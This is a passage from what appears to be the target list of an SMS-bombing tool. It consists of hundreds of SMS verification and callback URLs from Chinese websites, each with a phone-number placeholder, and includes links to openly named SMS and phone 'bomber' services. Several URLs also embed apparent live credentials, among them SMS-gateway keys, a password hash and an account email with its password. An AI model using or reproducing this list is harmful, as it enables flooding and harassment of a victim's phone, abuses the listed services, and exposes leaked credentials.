"http://api.fine3q.com/link-site/api/user/get_verification_code.json?ts=1561901787148&c_id=1&p=a&d_id=861913032338784&ver=3.1.5&mobile=[phone]", + "http://api.gaotu100.com/user/v2/send_passcode?captcha_mode=NETEASE&type=3&mobile=[phone]&code_type=0", + "http://api.hanju.koudaibaobao.com/api/user/verifyMobile?_ts=1564136775711&country=%2B86&mobile=[phone]", + "http://api.hanju.koudaibaobao.com/api/user/verifyMobile?_ts=1564136775711&country=+86&mobile=[phone]", + "http://api.hanju.koudaibaobao.com/api/user/verifyMobile?country=%2B86&mobile=[phone]", + "http://api.hanju.koudaibaobao.com/api/user/verifyMobile?country=+86&mobile=[phone]", + "http://api.hhyp58.com/basis/sendCheckCode?mobile=[phone]", + "http://api.hsj.huanci.net/index.php/api/user/isPhoneRegister?appVer=1.1.0&cur_user_id=-1&device=iPhone%206S&device_brand=Apple&device_model=iPhone&os_version=12.4&phone=[phone]", + "http://api.hsj.huanci.net/index.php/api/user/isPhoneRegister?appVer=1.1.0&cur_user_id=-1&device=iPhone6S&device_brand=Apple&device_model=iPhone&os_version=12.4&phone=[phone]", + "http://api.huatu.com/lumenapi/v4/common/message/send_by_java?callback=callbackSendCode&mobile=[phone]", + "http://api.jzhrj.cn/api/User/SendRegCode?mobile=[phone]", + "http://api.moonreader.cn/mreader/common/sendMobile.do?mobile=[phone]", + "http://api.moonreader.cn:80/mreader/common/sendMobile.do?mobile=[phone]", + "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", + "http://api.passport.pptv.com/snsms/sendcode?cb=msSendCode&phoneNumber=[phone]", + "http://api.passport.pptv.com/snsms/sendcode?cb=msSendCode&phoneNumber=[phone]&deviceId=p_1584518586025_48072460278550296&terminal=PC&channel=208000103005&uuid=0e2a64ae-e07e-49d6-852e-3de883df8003&imgCode=&format=jsonp&_=1584518959802", + "http://api.passport.pptv.com:80/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", + "http://api.qingmang.me/v1/account.sendVerification?code=1566478386.8872059778&phone=[phone]", + "http://api.qingmang.me/v1/account.sendVerification?code=1566478386.8872059778&phone=%2B86[phone]", + "http://api.qingmang.me/v1/account.sendVerification?code=1566478386.8872059778&phone=+86[phone]", + "http://api.qingmang.me/v1/account.sendVerification?code=1566478386.8872059778&phone=[phone]", + "http://api.qingmang.me/v1/account.sendVerification?platform=console&token=&phone=%2B86[phone]&code=10164337", + "http://api.qingmang.me/v1/account.sendVerification?token=&phone=%2B86[phone]&code=70428334", + "http://api.sms.cn/sms/?ac=send&uid=sun98&pwd=5a509d25c595fcec2561652992f1915b&template=542423&mobile=[phone]", + "http://api.sms.cn/sms/?ac=send&uid=sun98&pwd=5a509d25c595fcec2561652992f1915b&template=542423&mobile=[phone]&content={%22code%22:%22HQ98B%22}", + "http://api.v2.msparis.com/common/mobile?channel=App%20Store-vest&clientId=msparis-ios-4.2.4-vest&mobile=[phone]", + "http://api.v2.msparis.com/common/mobile?channel=App%20Store-vest&clientId=msparis-ios-4.2.4-vest&mobile=[phone]&platform=ios-vest&rent_mode=2", + "http://api.v2.msparis.com/common/mobile?channel=AppStore-vest&clientId=msparis-ios-4.2.4-vest&mobile=[phone]", + "http://api.wangxiao.cn/app/user.ashx?mobile=[phone]", + "http://api.wangxiao.cn:80/app/user.ashx?mobile=[phone]", + "http://api.xtgyl.cn/index.php/api_v1/api.app.login/sendCaptcha?mobile=[phone]", + "http://api.yinka.co/common/sms?cellphone=[phone]", + "http://api2.cloudlinks.cn:80/Users/PhoneCheckCode.ashx?CountryCode=86&AppVersion=6357251&PhoneNO=[phone]", + "http://api2.cloudlinks.cn:80/Users/PhoneCheckCode.ashx?CountryCode=86&PhoneNO=[phone]", + "http://app.ftutj.cn/web/api.php?s=/Join/verify/?0.24206258677631287&picCode=[phone]", + "http://app.quanlaoda.com/app.php?&m=code&a=send_login_code&phone=[phone]", + "http://app.syxwnet.com/?app=member&controller=index&action=sendMobileMessage&mobile=[phone]", + "http://app.syxwnet.com/?app=member&controller=index&action=validate&do=mobile&mobile=[phone]", + "http://appsever.caissa.com.cn/api/token/user/verifyAndgetCaptcha?data=%7B%22phone%22%3A%22[phone]", + "http://appsever.caissa.com.cn/api/token/user/verifyAndgetCaptcha?data={'phone':'[phone]", + "http://b2c.csair.com/portal/smsMessage/EUserVerifyCode?mobile=[phone]", + "http://bdp.haoyisheng.com/bdp/checkCode/getChkCode?timestamp=1600272327075mobileNum=[phone]", + "http://bizapi.pezy.cn/qknode/sms/reqSmsCode?df=android&publishid=1003&deviceId=8812baafc8de4fe4&vt=5&screen=720x1280&deviceid=&os=android&proid=qknode&av=MMB29M&appVersion=1.6.1&imei=&ov=6.0.1&osVersion=6.0.1&deviceVersion=Redmi%204A&osLevel=23&phone=[phone]", + "http://bizapi.pezy.cn/qknode/sms/reqSmsCode?df=android&publishid=1003&deviceId=8812baafc8de4fe4&vt=5&screen=720x1280&deviceid=&os=android&proid=qknode&av=MMB29M&appVersion=1.6.1&imei=&ov=6.0.1&osVersion=6.0.1&deviceVersion=Redmi4A&osLevel=23&phone=[phone]", + "http://bizapi.pezy.cn/qknode/sms/reqSmsCode?publishid=1003&deviceId=2808ec7ef7fbeed6&df=android&vt=5&screen=1080x1920&deviceid=2808ec7ef7fbeed6&proid=qknode&os=android&av=NMF26X&appVersion=1.4.0&imei=&ov=7.1.1&osVersion=7.1.1&osLevel=25&phone=[phone]&token=", + "http://cd.abiz.com/v3validcode?t=1604046053252¤tFindType=1&pageType=7&pn=abiz&validateCode=currentFindValue=[phone]", + "http://center.siyi.cn/process.aspx?c=sendvcode&vt=sms&va=reg&mobile=[phone]", + "http://cms.51fenmi.com/api/base/public/getCode?mobile=[phone]", + "http://cms.51fenmi.com:80/api/base/public/getCode?mobile=[phone]", + "http://codingle.cn/api/user/register/tel_verify?tel=[phone]", + "http://ct.ctrip.com/me/register/Verify?name=%E5%90%B4%E5%A5%87&email=357058116%40qq.com&mobile=[phone]&passwd=xiyu8187", + "http://cuckooshop.cn/SMS?phone=[phone]", + "http://dapi.mting.info/yyting/usercenter/getVerifyCode.action?phoneNum=[phone]", + "http://dgapi.zczgcn.com/shopSupport?Mobile=[phone]", + "http://edms.fcbox.com/hibox/weixin/getVerifyCode?mobilePhone=[phone]", + "http://exmail.qq.com/cgi-bin/bizmail_portal?action=send_sms&type=11&t=biz_rf_portal_mgr&ef=jsnew&resp_charset=UTF8&area=86&mobile=[phone]", + "http://exmail.qq.com:80/cgi-bin/bizmail_portal?action=send_sms&type=11&t=biz_rf_portal_mgr&ef=jsnew&resp_charset=UTF8&area=86&mobile=[phone]", + "http://flights.sichuanair.com/3uair/ibe/profile/processSendSMSNew.do?ConversationID=&smsType=REGISTER&mobilePhone=[phone]", + "http://gangqinpu.yusi.tv/?urlparam=cginfo/userinfo/sendsms&phonenum=[phone]", + "http://gd.10086.cn/easy/product/order/getValidateRndCode.jsps?commCode=LLKC300&merchantCode=GD&mobile=[phone]", + "http://gj.liansuosoft.com/ShopRegister/VCode?rand=0.3306040567511852&code=[phone]", + "http://group.leying.com/user/send-login-or-reg-validate-code?.sig=485fcbb8de19a6031a640e4fba81b7d7&cinema_id=23&city_id=502&client_id=3e5da9998f896&graph_validate_code=&group=20008&mobile=[phone]", + "http://gw.dianzuanmao.com/user/getCsbCode?phone=[phone]", + "http://h5.gmccopen.com/act/sso!sendSms.action?mobile=[phone]", + "http://hall.m.qxiu.com/mobileuser/user/getphonecode?phone=[phone]", + "http://haojue78.com/WS/WSAccount.asmx/SendMobileMsg?mobile=[phone]", + "http://hbrbapi.hubeidaily.net/amc/client/getAuthCode?mobilephone=[phone]", + "http://hdh.10086.cn/common/validationIP?phone=[phone]", + "http://hyuser.91huayi.com/ashx/sendSmsValidateCode.ashx?mobile=[phone]", + "http://i.im.etiantian.net/app-common-service/getPhoneValidateCodeForAixue.do?time=1563804384352&appId=561&typeId=1&uType=6&phoneNum=[phone]", + "http://i.kuwo.cn/US/2014/api/send_sms.jsp?mobile=[phone]", + "http://i.zhaopin.com/Login/LoginApi/SendBindSms?jsoncallback=jQuery16402676061029242586_1454143948438&businessType=C-Bind&t=1454143948656&_=1454143948656&mobile=[phone]", + "http://iclass.ruijie.com.cn/icmgr/rest/techReg/sms?timeStamp=1605428709505&phoneNo=[phone]", + "http://id.ifeng.com/api/simplesendmsg?mobile=[phone]", + "http://id.ifeng.com/api/simplesendmsg?mobile=[phone]&comefrom=7&auth=&msgtype=0", + "http://imfreecall.3158.cn/index.php/call?CB=WebFreeCall.callResult&C=60098&T=[phone]", + "http://iu.snssdk.com/user/mobile/send_code/?iid=80794405933&type=1&mobile=[phone]", + "http://j.esf.leju.com/ucenter/islejuuser?mobile=[phone]", + "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", + "http://jzplatform.com/distributor/sendcode_do.phpe.account=[phone]", + "http://ketang.ldcstudy.com/nsuser/h5/getCode.vm?phone=[phone]", + "http://koudaitong.com/v2/common/sms/imgcaptcha.jsonp?callback=jQuery1102009139976025888258_1433746978224&captcha_code=7998&_=1433746978226&mobile=[phone]", + "http://koudaitong.com/v2/common/sms/imgcaptcha.jsonp?callback=jQuery1102020099561656467435_1430461129946&captcha_code=0722&_=1430461129948&mobile=[phone]", + "http://kyddn.log56.com/sq_server/verifyCode.action?mobile_no=[phone]", + "http://ld.liandan100.com/ldmgr/api/user/sendVerifySms?platform=1&versionNum=53&&r=&partnerId=[phone]", + "http://liuyan.people.com.cn/verifycode/rand4?t=1603181060151&verCode=phoneNum=[phone]", + "http://lndx.edu.cn/Third/Mobile_SMS?Mobile=[phone]&beCallPhone=15810904000", + "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=0", + "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=1", + "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=10", + "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=11", + "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=12", + "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=13", + "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=14", + "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=15", + "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=16", + "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=17", + "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=18", + "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=19", + "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=2", + "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=20", + "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=21", + "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=22", + "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=23", + "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=24", + "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=25", + "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=3", + "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=4", + "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=5", + "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=6", + "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=7", + "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=9", + "http://m.anjuke.com/general/sendphonecode?phone=[phone]&captcha=", + "http://m.api.cetv.cn/v2/member?app_version=2.1.0&sign=f631db0bcb5fabc1b76679d9480e4f73&device_id=74:4A:A4:A6:B0:63&time=1561078945566&mobile=[phone]", + "http://m.egou.com/validate_phone.htm?phone=[phone]", + "http://m.fanli.com/invite/sendverifycode?jsoncallback=jsonp2&pos=601&t=1488608297799&mobile=[phone]", + "http://m.health.pingan.com/mapi/smsCode.json?deviceId=5a4c935cbb6ff6ca&deviceType=SM-G9300×tamp=1545122608&app=0&platform=3&app_key=PAHealth&osversion=23&info=&version=1.0.1&resolution=1440x2560&screenSize=22&netType=1&channel=m_h5&phone=[phone]", + "http://m.huibo.com/register/getAuthCode?txtPhone=[phone]", + "http://m.jianshe99.com/m_member/member/mobile_register/resendMsg.shtm?jsonpCallback=&_=&mobilePhone=[phone]", + "http://m.jiguo.com/mb/api/validatecode/color/mb.html?d=0.7554753933168952&vcode=tel=[phone]", + "http://m.logofree.cn/misc.php?act=send_sms&m=[phone]", + "http://m.renwo.com/Ajax/json.ashx?at=sendregsmsvcode&m=1&mobile=[phone]", + "http://m.robotest.cn/user/sms.html?tel=[phone]", + "http://m.sjingbang.com/api/app/sendSmsCode%2522,%2522rediskey%2522:%2522AppRegValidate%2522,%2522gjdqCode%2522:%252286%2522%257D&_1600248070800=[phone]", + "http://m.tk.cn/tkmobile/service/member?function_code=dynamicLogin&login_mobile=[phone]", + "http://m.xymens.com/index.php/Home/User/send_code?mobile=[phone]", + "http://m.yst.com.cn/pc/code/phone/regist?phone=[phone]", + "http://m.zhenai.com/v2/register/resendMobileCode.do?baseInfo2.serviceMobile=[phone]", + "http://maintain.yunzhandata.com/internal/customer/sendcode.json?mobile=[phone]", + "http://mall.95572.com/mobile/member/register/web/captcha?mobile=[phone]", + "http://mall.juzifenqi.com/termi/sendVerifySMSVH?mobile=[phone]&flag=1&verifyCode=", + "http://manage.univisa.cn/posts/random?callback=jQuery111308764434818808016_1596972033456&phone=target=mobile&mobile=[phone]", + "http://meeting.csco.org.cn/Admin/VerificationCode/?type=1&v=1&id=1&email=&checkcode=ipass=0&mobile=[phone]", + "http://member.ehaier.com/sendMobileSmsVerify.html?mobile=[phone]", + "http://member.for68.com/member/consult/sendRandcode.shtm?mobilePhone=[phone]", + "http://member.med66.com/uc/smscode?phone=[phone]", + "http://mkxq.zymk.cn/user/v1/mobilevc/?callback=jQuery321016123103253181426_1503210785449&mobile=[phone]&service=mkn&_=1503210785451", + "http://mobile.health.pingan.com/ehis-hl/ajax/sendOTP.action?smscc=ehiswxonly&phone=[phone]", + "http://mobile.health.pingan.com:80/ehis-hl/ajax/sendOTP.action?smscc=ehiswxonly&phone=[phone]", + "http://my.baihe.com/Getinterregist/captchaAndRegCheck?account=[phone]", + "http://my.baihe.com/Getinterregist/getPhoneVerifyCode?jsonCallBack=jQuery18306001467584540825_1439706800918&type=2&phone=[phone]&_=1439707017074", + "http://my.cnki.net/elibregister/Server.aspx?mobile=[phone]", + "http://open.leju.com/game/member/sendcode.html?phone=[phone]", + "http://open.zhundao.com.cn/api/v2/senCode?&phoneOrEmail=[phone]", + "http://pass.hujiang.com/Handler/UCenter?action=SendMsg&callback=&imgCode=&token=&_=&mobile=[phone]", + "http://passport.12371.cn/security/getMobileCode?type=regist&mobile=[phone]", + "http://passport.17house.com/login/sendSMSForMobileLogin?mobile=[phone]", + "http://passport.aplus.pptv.com/2015usercenter/api/sendphonecode/?phoneNum=[phone]", + "http://passport.ceair.com/cesso/mobile!geetCheck.shtml?_0.020283224898892227?mobileNo=[phone]&geetest_challenge=&geetest_validate=&geetest_seccode=", + "http://passport.chinahr.com/ajax/m/sendCode/[phone]?tmpid=1957&from=2&imgCode=", + "http://passport.chinahr.com/ajax/m/sendCode/[phone]?tmpid=773", + "http://passport.csdn.net/account/mobileregister?action=sendMobileCode&mobile=[phone]", + "http://passport.ctrl.cn/sms/reg?mobile=[phone]", + "http://passport.fang.com/loginsendmsm.api?MobilePhone=[phone]", + "http://passport.fang.com/loginsendmsm.api?callback=jsonp1475917947590&Service=home-club-web&backurl=&mobilephone=[phone]", + "http://passport.fang.com/loginsendmsm.api?callback=jsonp1475917947591&Service=home-club-web&backurl=&mobilephone=[phone]", + "http://passport.fanli.com/login/ajaxLoginSendVerfiycode?jsoncallback=jQuery183044493322381181954_1486714320243&pos=601&mobile=[phone]&_=1486714329485", + "http://passport.fanli.com/mobileapi/i/user/mobileFastReg?deviceno=860903034476055&mobile=[phone]", + "http://passport.fanli.com/mobileapi/i/user/mobileFastReg?deviceno=860903034476055&mobile=[phone]&mobilestep=1&verification_code=&verify_flag=&verify_global=ma624mg0j80trr7ldvwcl15c1f&c_aver=1.0&c_src=2&c_v=5.3.1.24&devid=63599267906091", + "http://passport.jcard.cn/Service/AjaxSendCodeService.aspx?doType=sendextcode&_=1445158370&mobile=[phone]", + "http://passport.ks5u.com/RPAjax.ashx?Param=009&PhoneNum=[phone]", + "http://ptlogin.4399.com/ptlogin/sendPhoneLoginCode.do?phone=[phone]", + "http://ptlogin.4399.com/ptlogin/sendPhoneLoginCode.do?phone=[phone]&appId=www_home&v=2&sig=&t=1592615855903&v=2", + "http://quan.lukou.com/api/sms/verification_code?phone=[phone]", + "http://readapp.ddyvip.cn/app/user/sendLoginCode.api?appVersion=2.4.4&inviteCode=&mobile=[phone]", + "http://reg.suning.com/ajax/code/sms.do?scen=WAP_WCHAT_PUB_ACCT_UNION_LOGIN_MOBILE_REG&phoneNum=[phone]", + "http://reg.suning.com/srs-web/ajax/code/sms.do?scen=PERSON_MOBILE_REG_VERIFY_MOBILE&phoneNum=[phone]&uid=&code=", + "http://reg.suning.com:80/ajax/code/sms.do?scen=WAP_WCHAT_PUB_ACCT_UNION_LOGIN_MOBILE_REG&phoneNum=[phone]", + "http://ruzhu.jd.com/user/sendVC?phone=[phone]", + "http://sapi.16888.com/app.php?mod=account&extra=mobileCode&mobile=[phone]", + "http://shop.shtv.net.cn/ShopWeb/Ajax/ChkSMSCode.ashx?t=0.016637186912638713&MobileCode=&type=user-registerphoneNo=[phone]", + "http://slb-sport.vesal.cn/vesal-sport-prod/v1/app/member/getCode?tellAndEmail=[phone]", + "http://slb-sport.vesal.cn:80/vesal-sport-prod/v1/app/member/getCode?tellAndEmail=[phone]", + "http://sms.bechtech.cn/Api/send/data/json?accesskey=1730&secretkey=3f198068c6b5c1036f9b38ae0690cc244695a247&mobile=[phone]", + "http://smsspub.mail.163.com/mobileserv/fsms.do?product=AndroidMail&template=ds&callback=sendCallback0&_=1430485975547&mobile=[phone]", + "http://splus.bianfeng.com/index.php?r=findAccount/SendCode&rnd=&a=[phone]", + "http://sso1.nlc.cn/sso/currency/sendCodeToMobile?mobile=[phone]", + "http://store.ncpa-classic.com/api/comm/smsNew?callback=jQuery17202866925711954793_1605436223502&mobile=[phone]", + "http://survey.dxy.cn/forms/public/survey2/captcha?sid=102998&itemid=127053&phone=[phone]", + "http://tel.kuaishang.cn/cl.php?tel=[phone]", + "http://tools.wx6.org/dianhuahongzhaji/?telcode=[phone]", + "http://tools.wx6.org/duanxinhongzhaji/?telcode=[phone]", + "http://ttq.api.yolanda.hk/api/v5/users/identifying_code.json?address=&app_id=TTQ&app_revision=2.2.2&cellphone_type=iPhone%206s-12.4&login=[phone]", + "http://ttq.api.yolanda.hk/api/v5/users/identifying_code.json?address=&app_id=TTQ&app_revision=2.2.2&cellphone_type=iPhone%206s-12.4&login=[phone]&mob_type=1&platform=iphone&send_type=1&systemLaunguage=zh-Hans-CN", + "http://ttq.api.yolanda.hk/api/v5/users/identifying_code.json?address=&app_id=TTQ&app_revision=2.2.2&cellphone_type=iPhone6s-12.4&login=[phone]", + "http://uac.10010.com/oauth2/OpSms?callback=jsonp1557631709566&req_time=&user_id=[phone]&app_code=ECS-2233&msg_type=01", + "http://uac.10010.com:80/oauth2/OpSms?callback=jsonp1557631709566&req_time=&user_id=[phone]", + "http://uniservice.kugou.com/v2/activity/sendCode?call_number=[phone]&cb=kgJSONP239130071", + "http://user.app.nanrenbang.in/user/user/getvalidate?phone=[phone]", + "http://user.daojia.com/mobile/getcode?mobile=[phone]", + "http://user.daojia.com/user/getSmscode?mobile=[phone]", + "http://user.daojia.com:80/mobile/getcode?mobile=[phone]", + "http://user.memeyule.com/authcode/send_mobile?china=true&mobile=[phone]", + "http://user.memeyule.com/authcode/send_mobile?mobile=[phone]", + "http://v.juhe.cn/sms/send?mobile=[phone]", + "http://v.juhe.cn/sms/send?mobile=[phone]&tpl_id=11115&tpl_value=", + "http://vip.haier.com:80/vipCode/user/sendMobileCode?sendType=codeLogin1&domainName=Haier&mobile=[phone]", + "http://vip.timesawards.com/Method/getAuthCode?target=[phone]", + "http://voip-newapi20160601.voip-oem.com/api/Account/GetValidateCodeNoUser?SrcPhone=[phone]", + "http://w4.duoyi.com/p_user/DoNewActCards.aspx?gate=sw&jsoncallback=jQuery18303232165043277003_1483854401800&act=getsmscode&phone=[phone]", + "http://wap.10010.com/mobileService/tuiguang/sendMsg.htm?mobileNumber=[phone]", + "http://wap.ghs.net/wap/wxregister-checkMobile.html?uname=[phone]", + "http://web.5zhuan.com/?ac=getmsgcode&cphone=[phone]", + "http://web.enjoysms.cn/do/safecode.do?0.4155260914653185&VerifyCode=[phone]", + "http://weizhang.58.com/user/login/getcode?mobile=[phone]", + "http://wifi.gd118114.cn/getPassword.ajax?username=[phone]", + "http://wifi.gd118114.cn/getPassword.ajax?username=[phone]&accessType=1&circleId=100000055", + "http://wifi.gd118114.cn/getPassword.ajax?username=[phone]&os=h5&_srcid=10000386", + "http://ws.sythealth.com/wsbyte/fit/v4/sms/validatorcode?form=0&account=[phone]", + "http://www.100ppi.com/ecp/ppi/get_sf/get_yzm.php?m=[phone]", + "http://www.12chu.com/reg/sendCode.jhtml?mobile=[phone]", + "http://www.52tanbao.com/tanbao-app-api/SendValidCode?telephone=[phone]", + "http://www.7881.com/img_valid.jsp?param=1557302312619&t=0&phone=act=reg&captcha=[phone]", + "http://www.97sq.com/dx/index.php?hm=[phone]", + "http://www.98xianyou.com/passport/sign/code.html?mobile=[phone]", + "http://www.aipai.com/app/www/apps/ums.php?step=ums&mobile=[phone]", + "http://www.aipai.com/app/www/apps/ums.php?step=ums&mobile=[phone]&callback=jQuery17209171715653229815_1599374652809&_=1599374671117", + "http://www.appbesafe.com/htourist/sendPhoneMessageZc?phone=[phone]&type=1", + "http://www.baixing.com/m/oz/verify/?fromS9=1&identity=[phone]&mobile=[phone]", + "http://www.baixing.com/oz/verify/reg?mobile=[phone]", + "http://www.baixing.com:80/m/oz/verify/reg?mobile=[phone]", + "http://www.booms.ga/index.php?hm=[phone]", + "http://www.booms.ga/mini/index.php?hm=[phone]", + "http://www.dangaoss.com/h5/acc/send_code?_t=1552475308&sign=424064b2d2d003d83db05380438824cb&username=[phone]", + "http://www.dye-ol.com/code/ValidCode.aspx?r=0.503437238889475&Code=3&UserID=0Mobile=[phone]", + "http://www.e8088.com/index/product/try!phoneVerifyCode.action?tipMessage=[phone]", + "http://www.eyprint.com/include/getcode.php?telnum=[phone]", + "http://www.fcbox.com/noshiro/retrievePhoneMessagePreventAttacks?mobilePhone=[phone]&smsType=5", + "http://www.flyertea.com/plugin.php?id=dzapp_mobile&mod=ajax&ac=code&type=reg&inajax=1&formhash=e55ad49c&mobile=[phone]", + "http://www.fvv678.cn/app/user/checkMobileReg?mobile=[phone]", + "http://www.gmmc.com.cn/ajax/H5Handler.ashx?method=SendH5VerCode&mobile=[phone]", + "http://www.gmsweipai.com/gms/api/common/[phone]", + "http://www.happigo.com/shop/index.php?act=login&op=send_auth_code&mobile=[phone]", + "http://www.henhuoapp.com/api/method/getCode?phone=[phone]", + "http://www.humengyun.com/index.php?a=login&m=sendSMS&mobile=[phone]&_=1480986460007", + "http://www.hzrc.com/ww/b/a/wwba_sendMobileCode.html?phone=[phone]", + "http://www.jc258.cn/signup/send_sms?mobile=[phone]", + "http://www.jiedai315.com/SendCode.ashx?Mobile=[phone]&Identifier=6", + "http://www.jiqinging.com/ajax.php?do=getCheckCode&tel=[phone]", + "http://www.jiqinging.com/ajax.php?do=getCheckCode+tel=[phone]", + "http://www.jxxw.com.cn/app/user/sendLoginCode?username=[phone]", + "http://www.lamall.com/user/sendsmscode?jsonpCallback=$.jsonp.jsonp1445158351&mobile=[phone]", + "http://www.lecake.com/customer/get-code.html?yzm=10000&mobile=[phone]", + "http://www.loho88.com/activ_check_mobile.php?activ_id=67&activ_type=mis&part_id=body_1_4&goods_id=100&is_new_customers_allow=0&phone=[phone]", + "http://www.longone.com.cn/servlet/user/Register?&function=AjaxGetPin1&mo=[phone]", + "http://www.meisupic.com/user.php?act=ajax_validate_sms&bizcode=11&captcha=type=5&mobile=[phone]", + "http://www.milvwang.com/user/isRegister/?mobile_phone=[phone]", + "http://www.mzsky.cc/plugin.php?id=smstong:verifycode&idhash=SJw54jL0&formhash=82e4ff11&seccodeverify=&inajax=yes&infloat=register&handlekey=register&ajaxmenu=1&action=getregverifycode&mobile=[phone]&0.7010368446838822", + "http://www.passpay.net/login/sendVerifyCode?mobile=[phone]", + "http://www.patfun.com/do.php?ac=check_sms&phone=[phone]", + "http://www.plaso.cn/plaso/servlet/randomCode?0.47652275536418554&type=loginrandom=[phone]", + "http://www.pumg.com.cn/phone.do?USERTEL=&token=bZnQLILMeWM8EF57AsIxdhwWOYyUAzSdLGLdb%2FIcj5TxIUMmRFcqAQ%3D%3D&type=0&flag=0×tamp=1548589939708telphone=[phone]", + "http://www.puyitou.com/service.html?SERVERID=770010&BIZ_CODE=REG_PHONE_CODE&PHONE_NUM=[phone]&SEND_TYPE=2", + "http://www.qmango.com/users/ajax/ajax_register_code.asp?_=1487743660579&mobile=[phone]", + "http://www.shdsyy.com.cn/web/index.php?classid=9191&action=call&phone=[phone]", + "http://www.sk-vip.cn/index.php?m=&c=page&a=yunhu&phone=[phone]", + "http://www.super8.com.cn/Ajax/HotelInterface.ashx?action=sendmsg&mobile=[phone]", + "http://www.taoguba.com.cn/sendCodePC?codeType=ZCYZ+phoneNumber=[phone]", + "http://www.tell520.com:80/ajax/do.html?action=sendSms&type=reg&YII_CSRF_TOKEN&phone=[phone]", + "http://www.udache.com/app/mQuickReg/getSmsCode?phone=[phone]", + "http://www.upshop.cn/Home/User/registerSendCode.html?mobile=[phone]", + "http://www.vatti.com.cn/index.php?m=Home&c=Api&a=[phone]", + "http://www.wehealthchina.net/api/v0.1/vcode?app=doctor&client=android&action=register&phone=[phone]", + "http://www.wfggw.com/getcode.asp?num=[phone]&_=1480403250456", + "http://www.xd.com/users/sendWebRegCode?callback=jQuery110208424835141365408_1600270044866&mobile=[phone]", + "http://www.xjwvxz.com/api/call/index?user_id=244127&auth_key=c602e6ebb2311895b922d5bef854dc87&type=c&proxy_id=148455&phones=[phone]", + "http://www.xlcidc.com/chkName.asp?umobie=[phone]", + "http://www.xlcidc.com/chkName.asp?umobie=[phone]&lm=sendmobi&sd=0.5806221691630391", + "http://www.xuebangsoft.net/eduboss/CommonAction/sendVarifyCodeToPhone.do?phoneNumber=[phone]®TimeCode=1589627585503", + "http://www.xyqb.com/LKB/lg/sendSms.html?random=&loginName=[phone]", + "http://www.youxia.cn/go/index.php?mod=account&code=getRandCode&pic_code=undefined&phone=[phone]", + "http://www.zhichiwangluo.com/index.php?r=Login/phoneResetCode&phone=[phone]", + "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", + "http://www.zoneidc.com/user/sendmobi.asp?mobi=[phone]", + "http://www.zuoyebang.com:80/session/pc/sendtoken?ajax&phone=[phone]", + "http://www25c1.53kf.com/impl/rpc_callback_phone.php?from=api&company_id=72204003&guest_id=11199824994006&style=1&from_page=https%3A%2F%2Fwww.baidu.com%2Flink%3Furl%3D3RHZQYd7M-TF4MUvr7tQD4xVSYxHv_IWj2SbNAAdoKtf_Xk51H_avXcuoOtSQIe96CW0u5SYUWmlZJPnQXRVka%26wd%3D%26eqid%3D9f6d04a1000e3ecf000000065fb824c2&talk_page=http%3A%2F%2Fwww.yueshi-edu.com%2Fvxueli%2Fsz%2F5762.html&land_page=http%253A%252F%252Fwww.yueshi-edu.com%252Fvxueli%252Fsz%252F5762.html&call=[phone]", + "http://wx.bda.com/ajax/ajax_login.php?action=[phone]", + "http://wx01.lecake.com/customer/get-code.html?mobile=[phone]", + "http://yueban.500zhuan.com/tools/getNum?&phone=[phone]", + "http://z.7qi.me/index.php?call=[phone]&ok=", + "http://zaiwai.8848.com/commonService/findMessageToken?phone=[phone]", + "http://zaiwai.8848.com/commonService/sendNewVerificationCodeToPhone?phone=[phone]", + "http://zhibo.zuoyebang.com/elearning/index/sendapplytoken?phone=[phone]", + "http://zhuikanxs.com/novelapilogin/sendsms?phone=[phone]", + "http://zntouzi.com/front/account/verifyMobileForReg?randomID=d2b07acd-917c-4d81-a849-9c694f25833b&code=111111&mobile=[phone]", + "https://account.perfma.com/api/login/authentication/v1/picCaptcha?2&phoneCaptcha=[phone]", + "https://androidapi4.yc.ifeng.com:443/api/fread/user/msgAuthCode?phoneNum=[phone]", + "https://api-dcdn.jiayouxueba.cn/api/v3/sms/vcode?countryId=685&mobile=[phone]", + "https://api.aihecong.com/account/vercode?type=register&antiBrush=ecdfddd24937106ex&callback=JSONP_1580388414994&tel=[phone]", + "https://api.bat100.net/v1/authority/sms/send-sms?tel=[phone]", + "https://api.dongqiudi.com/v3/useract/app/user/postGottenlCode?phone=[phone]&requestTime=1596183059901", + 